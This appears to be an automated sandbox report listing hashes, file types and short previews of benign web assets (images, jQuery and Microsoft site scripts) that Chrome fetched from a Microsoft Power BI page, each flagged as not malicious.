                                                                                                                                                                                                                                                          SHA-256:EDBB53CC179C808EF9290A475D62A37600206B2C55A827370C700444880DEDCC
                                                                                                                                                                                                                                                          SHA-512:AF0564F02E3C8336596BC6F1749AACE55C27EECB12FC3E8E078618251C0D02D1132231FC9F4A0A09DE5E762A6E2315442E1DF905A73C6E4F291F5E344C20F847
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Resouces-01-416X179?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1010&hei=433&qlt=95&fmt=png-alpha&fit=constrain"
                                                                                                                                                                                                                                                          Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............}....(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma.................}.mdat.....&?....4..2....0.....E......>>_}..&...8...S..P...?d j......BQ4....<.p.|Lk..gI>.L..F... .)..kY2....._.r..NO....B...5..1/...f.v.6F...;........Y..+..;....|l..n.S...'.Y....m.`.8.4.A..P...0!i}..?...Aj..ll....F+..5...J......B.....lc-..^.....@...h.~.eb.U.{(.C%..k.`.#..,N7...92.(.T....s.q......1(w.."....p..\...\...g.}\d...wJ...b|Pg.f.....n.Z...o.^.r..n*...:.EG......Q..TF...F......eb0....H.Hx....m;...u.5.F!4..r..6./GHG.............X..]......>..;....B........0U34....j..(.R.JH.'.nFa.....H..1R........&....,..Y3.v+?.z@....v...l...M.$.3......si...{.%..;.'...GG?<I..$..r].:<9....%c.kZ....C...[.P......Em.s.d.V...D.....J../...'..KV.F.z.(......`.<.V.}.....Z<..Y..P.ai2.Gn.l.?.!.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):9539
                                                                                                                                                                                                                                                          Entropy (8bit):4.727148213062689
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:3lGqnBqPmIa4HAb1WWe13GgkNb2c6cN0JL2xl9zbIPcJtQIgGySjye1nGEZ8UhWW:3l/gPmIaP3U2gkNCcUJL2xlq0Jt6G351
                                                                                                                                                                                                                                                          MD5:9EEA5F80FED74A300CCBBAA4DC41DF2A
                                                                                                                                                                                                                                                          SHA1:08568A33ED8E994237DB997AFABF85723AD7E92D
                                                                                                                                                                                                                                                          SHA-256:32E9B0F50257F381F3F1F3002B7DFD3AF138916429D53FAAC58FD9D0D1550CF4
                                                                                                                                                                                                                                                          SHA-512:0114AC63E722B5628605986B2F2A483F2822CE043F988638DE3DEE202BA96D91B5AE723D585558540A123C9978BEC169C90FF98E567ED74053D57EDE7F1340DB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-action.min.ACSHASH9eea5f80fed74a300ccbbaa4dc41df2a.js
                                                                                                                                                                                                                                                          Preview:/**.* This function is to add source parameter through JS in the hyperlink..*/.$(document).ready(function () {. const appendReferrerLinks = document.querySelectorAll('[data-isautoappendreferrer="true"]');. if (appendReferrerLinks.length) {. const lang = "/" + document.documentElement.lang?.toLowerCase();. let currentUrl = window.location.href.toLowerCase().replace(window.location.search, "").replace(lang, "");. if (currentUrl.endsWith("/")) {. .currentUrl = currentUrl.slice(0, -1);. }. const sourceLink = "srcurl=" + encodeURIComponent(currentUrl);. appendReferrerLinks.forEach(link => {. if (!link.href.includes("srcurl=")) {. const separator = link.href.includes("?") ? "&" : "?";. link.href = link.href + separator + sourceLink;. }. });. }.});./**. * Query Parameter Passthrough Utility. *. * This utility updates anchor tags in a web page by modifying the. * 'href' attribut
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):89501
                                                                                                                                                                                                                                                          Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                                                                                                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (26038)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1075049
                                                                                                                                                                                                                                                          Entropy (8bit):5.534428059476112
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24576:d20QNvWXig0OTihO3oLGiUL3JCwKlJUhtj1HcKiJvQnR7siWP6VJywywjYenicPE:d20QNqig0OTihO3oLGiUL3JCwKlJUhte
                                                                                                                                                                                                                                                          MD5:40E19CF8ACC7DA8B412D9DC7AEC9CADF
                                                                                                                                                                                                                                                          SHA1:1C8C41E5539DF84A456E7489337232CD39B935D6
                                                                                                                                                                                                                                                          SHA-256:8FFC6D2FF1CFE373AA978197626007D737D245DE335B028DC832C53D4EAD3A94
                                                                                                                                                                                                                                                          SHA-512:1FAA14005B3390DEBBD54BED2156DA6C7ACF6B2A547D7B31A4ABD2FBC9333017AA1749F0FE4F72F1A7A6AAFF095DFF5F1472C09B2F75BBB047D86135668B8AC8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:// Universal Media Player.// Build Date: 2024-12-18T00:52:50.018Z.// Commit: 3c417ad49a0341f52951cad65ea4e26f64002fda.// Build Number: 20241218.02../**. * @license. * Copyright 2021 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */let U8=class extends Event{constructor(a,s,l){super("context-request",{bubbles:!0,composed:!0}),this.context=a,this.callback=s,this.subscribe=l??!1}};/**. * @license. * Copyright 2021 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. *//**. * @license. * Copyright 2021 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */let O8=class{constructor(a,s,l,p){if(this.subscribe=!1,this.provided=!1,this.value=void 0,this.t=(d,m)=>{this.unsubscribe&&(this.unsubscribe!==m&&(this.provided=!1,this.unsubscribe()),this.subscribe||this.unsubscribe()),this.value=d,this.host.requestUpdate(),this.provided&&!this.subscribe||(this.provided=!0,this.callback&&this.callback(d,m)),this.unsubscribe=m},this.host=a,s.context!==void 0){const d=s;this.context=d.context,this.c
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1976
                                                                                                                                                                                                                                                          Entropy (8bit):4.4820518319503835
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:+cntsSY/J2UDI2sGulM/wlN1vq0GAg/QK0j2rQzMGuFiFmGIGuFrFmGdqs:PnOSYhJDIJlMolN1wv0/yUFYNFvqs
                                                                                                                                                                                                                                                          MD5:106A6A519DAD38A935C4D5AA2786D6FB
                                                                                                                                                                                                                                                          SHA1:3340ADF8A3220D92786A423BEED46092103C5D7D
                                                                                                                                                                                                                                                          SHA-256:C0F462098BFAC577C182C3A983C6A35A5016A5EE96655CF7B57A46F70EAB83EF
                                                                                                                                                                                                                                                          SHA-512:8F0E42976D0D5D362CECD6CDDBE3F1DC84BAC7149DBAA78C8787409EE4224D04E5FE8D68631799ABF3E2DFA04D97B87F9F93A9B3399632E15C135B527558273A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:.(function (document) {. document.addEventListener("DOMContentLoaded", () => {. const attrElement = $(".ocr-accordion .btn-collapse");.. /**. * Data attributes for accordion elements.. * @typedef {Object} DataAttributes. * @property {string} off - Data attribute value when the element is collapsed.. * @property {string} on - Data attribute value when the element is not collapsed.. */. const dataAttributes = {. "bi-bhvr": { off: "7", on: "8" },. "bi-ct": { off: "Accordion Expend", on: "Accordion Collapse" },. };.. /**. * Update data attributes based on the collapse state.. * @param {Object} currentObj - Current collapse instance.. */. const updateDataAttribute = (currentObj) => {. const isCollapsed =. currentObj?.triggerElement.classList.contains("collapsed");.. Object.entries(dataAttributes).forEach(([attribute, values]) => {. const dataAttrValue = isCollapsed
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:PNG image data, 22 x 93, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):61
                                                                                                                                                                                                                                                          Entropy (8bit):3.9821736799861016
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:yionv//thPlritlEsyxl/k4E08up:6v/lhPktlEB7Tp
                                                                                                                                                                                                                                                          MD5:17FCEBAA2F4E3E0B4BCF5DD7BAF5BEC8
                                                                                                                                                                                                                                                          SHA1:43933DC19D2306C3764AD18AB65E0D16B4B3D3D8
                                                                                                                                                                                                                                                          SHA-256:8DF68A283A6189DE7A194623DEEE99A13E17D439009D774353891F4B63E717A2
                                                                                                                                                                                                                                                          SHA-512:46872B99931030F6D2C37A82261FD36C36CAD4D42A609D8382996BEF6B0A86E4090C3696C85104C257E0CE4A988C7C5888FEDA7934F2BBC9380E62C97CBD1AD7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.......]......I......IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1238
                                                                                                                                                                                                                                                          Entropy (8bit):7.762139796417613
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:hU1mDHXJgMfO7ky7ApZsD6xuPPGxJsN+Q8Fw0/g5suF9zR+2/:ZDWMWZUpg6YHGxSUpFMT/
                                                                                                                                                                                                                                                          MD5:E206A414839ECEFD736493FB77DEDEDD
                                                                                                                                                                                                                                                          SHA1:204FD11DCEA0FDD54A6547F6093E675691DD5E01
                                                                                                                                                                                                                                                          SHA-256:A12055D52F7150061AF6075F344857C1B52CB5DA70CB1A5DA5E515F9ED2E88F3
                                                                                                                                                                                                                                                          SHA-512:05FFF8E484715F56FBB3FD46D18C52B0C8050AE9E3E8D30C1DA59B521E634BA45B37947A94C7FABDEC05EC1CA4CE228FD49F234AF43B082A703BC188DBE78DC8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8L..../_....Em.1....#..".?..F..@}...lj.UU-.,Fz.IZ.i#....|y.i.}....$........I..m./c..........\._:...~..p..^........U..<...$Yu.33...o....b.Qf<....LQ.$I.$./3...{.|Wit.m[.'...$...V...R%P1...;..6`... ..P.;....1...[...3.....##Xpd.....#...#..;....N#_c.K.|..~..|..b?.#....Y.....Y.W.......3)$.A.p...._.../.....\.pd8.N......|z..'............$......../.p]..:....U...-6..j.*4.....W*.(iR..(.!..J!U..l..D..$. V...JR,...z.....J.+9.EE5P.&...?..Ah5T.;.>..!-......Z)A.(....]w..7.&a...x..A.(.....S..0...o/....N1.F.P...Z% ..lR......(4*.W:.H.J......jR...J.....@b&PRD.... ..d#.3....F.2..(.ImY3...(.5BM...TNb....1#M1.&i.2.....^4...... EZC.j.. "6..........'.a.._..o.}~......a.(E..?].q...ImM......7.....2i.*M...D..N[....,.6tH...>=...jZ=.A.\...k.CS.LM0J8;.Sh..jZ..JJY 2l.0)5..J..jJ#.Z.%.%.@N.(M)E`@.e.4.4...z.....1..!.)..Uk5=D5ATJ. .Fb41.. ..F.5e.Xa...l...Tg..FR%fb.f`.Ih.Q6..0#...1.. .@.....Z......*...L.h& .H..8.n.i..$3...&1..0....$.d.v.;.....$%..)...`...D%.lPC-....FC..cb..D....
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (6713)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):175000
                                                                                                                                                                                                                                                          Entropy (8bit):5.1720925943540115
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:Si8XObhuZgZbWzhGDBQVRPWqrsG8dF/O9Z/QQiSl0ySjB/ehDna:Si8XObhuZgZaFGDBQjPWqrsG8dcWSlS
                                                                                                                                                                                                                                                          MD5:5FDA6CCAEFB864273B174A4F9C5B0243
                                                                                                                                                                                                                                                          SHA1:1758CAAFB15FA57F6B8101B600FFD63BBB1E401D
                                                                                                                                                                                                                                                          SHA-256:A6409F5E5F745F861B2A29AD866AD9C10204659DFE86E71BF4828A2B168AB029
                                                                                                                                                                                                                                                          SHA-512:AFE1299ECBCE4AD5BA7379CFD67CC93EBA9EE028B8DBAF9FFE7B506B283F233C754F1BBD11E6C55D616882C945A4BE3B2B09FBE697FCC6C1627C182CB3F0788E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/en-us/power-platform/products/power-bi/getting-started-with-power-bi
                                                                                                                                                                                                                                                          Preview:<!DOCTYPE HTML> <html lang="en-US" dir="ltr"> <head> <meta charset="UTF-8"/> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/> <meta http-equiv="x-ua-compatible" content="ie=edge"/> <link rel="SHORTCUT ICON" href="/favicon.ico?v2" type="image/x-icon"/> <meta name="robots" content="index, follow"/> <meta name="template" content="reimagine---pdp-template"/> <meta name="awa-canvasType" content="web"/> <meta name="awa-isTented" content="false"/> <meta name="awa-pgtmp" content="reimagine---pdp-template"/> <meta name="awa-pageType" content="Microsoft Power Platform"/> <meta name="awa-market" content="en-us"/> <meta name="awa-cms" content="AEM"/> <meta name="awa-enabledFeatures" content="contentbackfillgenerate;esiproductcards;feature-controlled-mwf;uhf-ms-io-endpoint;uhf-esi-cv;uhf-esi-cache;fraud-greenid;contentsquare;mediapixel;holiday-themer;lazyload-static-components;clientlibDefer;upsellEnabled;contentbackfillpkgdelete;healthcheck;contentbac
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (526)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):1683
                                                                                                                                                                                                                                                          Entropy (8bit):4.981226266363334
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:vvJ/iwjBViZF/HGbP4aSnlS9DT/PY11oBJ:nJ6MTmF/HegaSMZ
                                                                                                                                                                                                                                                          MD5:551A5D1B5EBF715E3F78C311A57FA1D7
                                                                                                                                                                                                                                                          SHA1:29EF719E00736BCFED725EC095ACA14578891F1B
                                                                                                                                                                                                                                                          SHA-256:E1831970A3626C40DCAC24CAA7D40A342D02CF450942657456EDDF123D4A6289
                                                                                                                                                                                                                                                          SHA-512:3ED0957342D84997D937CF36353D90CF05C9CA44EA16D13FC1D86FDA33585D1D614DB4CE27DC936575E8A4C247CC241D4CE7EDB6E37947020E4EE65761ACFE80
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-market-layer.min.ACSHASH551a5d1b5ebf715e3f78c311a57fa1d7.js
                                                                                                                                                                                                                                                          Preview:'use strict';(function(f,b){const e=["data-marketlayer-submarket","data-marketlayer-content","data-marketlayer-selector","data-marketlayer-position"];let h=b('[data-mount\x3d"market-selector"] select'),r=b('meta[name\x3d"marketLayerOverride"]:not([data-marketlayer-submarket])'),t=b('meta[name\x3d"marketLayerOverride"][data-marketlayer-submarket]'),g=[];const l=c=>{let a=[];t.each(function(){if(b(this).attr(e[0])==c){var d={content:b(this).attr(e[1]),selector:b(this).attr(e[2])+":not([meta])",position:b(this).attr(e[3])};.a.push(d);console.log(d)}});r.each(function(){let d=b(this).attr(e[1]),n=b(this).attr(e[2])+":not([meta])",p=b(this).attr(e[3]),q=!1;for(let k=0;k<a.length;k++)if(n==a[k].selector&&p==a[k].position){q=!0;break}q||a.push({content:d,selector:n,position:p})});console.log(a);return a},m=c=>{c.forEach(a=>{if("append"===a.position)b(a.selector).after(a.content),g.push({element:b(a.selector).next(),action:"remove",content:""});else if("prepend"===a.position)b(a.selector).befo
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (47691)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):47692
                                                                                                                                                                                                                                                          Entropy (8bit):5.4016459163756165
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                                                                                                                                                                                                          MD5:9046FDD8B20F930F537279DEDE41E747
                                                                                                                                                                                                                                                          SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                                                                                                                                                                                                          SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                                                                                                                                                                                                          SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (42133)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):138268
                                                                                                                                                                                                                                                          Entropy (8bit):5.224497765711851
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3072:1f4HuF7pxnISnJ9d1EwgXA7CisuMK/xw/:1f4Hu1I+Tw/
                                                                                                                                                                                                                                                          MD5:5B85413B96AF340238B93068CDB641FB
                                                                                                                                                                                                                                                          SHA1:D949C985DF4F80FAB0CF036A1DD86C63CA342F1F
                                                                                                                                                                                                                                                          SHA-256:1B448C19C6DF1F2D15399A710A73BB3EC0C5233B571CDFAE9CCA315E6E13FB85
                                                                                                                                                                                                                                                          SHA-512:5B7E26BB4C72A8D8EE6CD20EEEA354ADD396F74289BD3E42CD1D6C8A5D3FA1B190CC62B953CAF4FA38EFDA0983F90F937276C8797EB2E1BADC11F9F5161117CE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):8755
                                                                                                                                                                                                                                                          Entropy (8bit):7.957046074835096
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:+WNsC3z51pcOlhSSN78lX07Qmr8dRCHW4qApcLafAGcsVzeybZHQnP:Pj5HhSSNIXrxDf4BpcLYAGPSyt0
                                                                                                                                                                                                                                                          MD5:125A6779242132EEA9A8DDAB98306274
                                                                                                                                                                                                                                                          SHA1:7A8246AEB7B39058C21BF90B56FFF64EE3AC7143
                                                                                                                                                                                                                                                          SHA-256:64ECCFC118015562FCFC32EB06A4B7CF37FA5450BCFF9899C9DBC16D0C915DC5
                                                                                                                                                                                                                                                          SHA-512:5FC49ACBC634B0BF07A91104EACB00B086BDA44947FFF4B6D09EBEEBBA5E7C2673B18F93C8697EDFE92E03D96CA3B43639F44A425624433FA7019D3161155C21
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/feature-grid-BG-1600X724?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1600&hei=724&qlt=95&fmt=png-alpha&fit=constrain"
                                                                                                                                                                                                                                                          Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............!....(iinf..........infe........av01Color....jiprp...Kipco....ispe.......@........pixi............av1C........colrnclx...........ipma.................!!mdat.....*q.......2.BD........S...J.. ...........!......|..V..<.....`..O.....Q..&].$..;?5..).cEH.S.t._...Z!}..].-y.5C.,..H..rh.{(s..".=.....<.....EX..k8.f.z!.H..g..|..D.....d..C.kd.#..^P..`..A/k\.j....Q7v......2<q>..51.e2..}".z..C..L$y...i.......?j=.....a..0..i..eVh@u..R.....a...."....d+.:.ON?......e.T.@.4.!...e..Z..c@..d...K.....Kp.;8x...j...s...!jd?..`!...H........p..`...?..+......h...?.p...#.7.......Pa.oCv.....ZLo.i&0...N.gk.#..@aA.4.0...y./.Tz..j.!2H!u`Fq...~..b.D..v}.."w[.f....M..a'C....e...*....<J...)d...xA.+.....v.+......C..=.)S.?]J.S.b9.po.`..ic0l{..+.r\..^I.R..6..9.r.iPd.....)x.5,........#.sG>.I.r.O..xJVpB..r.....'...>.nQ|0...*...L'.5.'....d}V...S..r.?(..Fn..;.WMc..+..t.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):7370
                                                                                                                                                                                                                                                          Entropy (8bit):3.75734059903263
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:ABNDpn0ClSyOM+kS1GgOO4Ry/SbSCRt3NXZv9c8ZmOy7PmcscRxqQLC8t5XKFOh5:ABNd93OM+kSFcPb9Rr1ybmcVt5XK/E
                                                                                                                                                                                                                                                          MD5:78CAE0B5E8FB1E22438351F87E648B9C
                                                                                                                                                                                                                                                          SHA1:DDA45E1E6E25100736B33A4614869200FF59556C
                                                                                                                                                                                                                                                          SHA-256:689F7AA37A90110B616381333171DE18B3F3A06B3B965FCE73BBBB84D0B777D7
                                                                                                                                                                                                                                                          SHA-512:43E48DF413591881F27A96858B7FA4EC77EFF66D56C64BE81D04F5A85F2701374E871F021B1BDE808211BE4D40B12A10F28D2AF5BF520BC523FAD909144C242C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:<svg width="23" height="24" viewBox="0 0 23 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M11.25 4.5C12.1797 4.5 13.0547 4.67578 13.875 5.02734C14.6953 5.37891 15.4102 5.86328 16.0195 6.48047C16.6289 7.09766 17.1094 7.8125 17.4609 8.625C17.8125 9.4375 17.9922 10.3125 18 11.25C18 11.7422 17.9688 12.2031 17.9062 12.6328C17.8437 13.0625 17.7461 13.4727 17.6133 13.8633C17.4805 14.2539 17.3086 14.6406 17.0977 15.0234C16.8867 15.4063 16.6367 15.7969 16.3477 16.1953C16.1211 16.5078 15.9219 16.7891 15.75 17.0391C15.5781 17.2891 15.4375 17.5391 15.3281 17.7891C15.2188 18.0391 15.1367 18.3125 15.082 18.6094C15.0273 18.9063 15 19.2539 15 19.6523V21.75C15 22.0625 14.9414 22.3555 14.8242 22.6289C14.707 22.9023 14.5469 23.1406 14.3438 23.3438C14.1406 23.5469 13.9023 23.707 13.6289 23.8242C13.3555 23.9414 13.0625 24 12.75 24H9.75C9.4375 24 9.14453 23.9414 8.87109 23.8242C8.59766 23.707 8.35938 23.5469 8.15625 23.3438C7.95312 23.1406 7.79297 22.9023 7.67578 22.6289C7.55859 22.3555 7.5 2
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (26038)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):1075049
                                                                                                                                                                                                                                                          Entropy (8bit):5.534428059476112
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24576:d20QNvWXig0OTihO3oLGiUL3JCwKlJUhtj1HcKiJvQnR7siWP6VJywywjYenicPE:d20QNqig0OTihO3oLGiUL3JCwKlJUhte
                                                                                                                                                                                                                                                          MD5:40E19CF8ACC7DA8B412D9DC7AEC9CADF
                                                                                                                                                                                                                                                          SHA1:1C8C41E5539DF84A456E7489337232CD39B935D6
                                                                                                                                                                                                                                                          SHA-256:8FFC6D2FF1CFE373AA978197626007D737D245DE335B028DC832C53D4EAD3A94
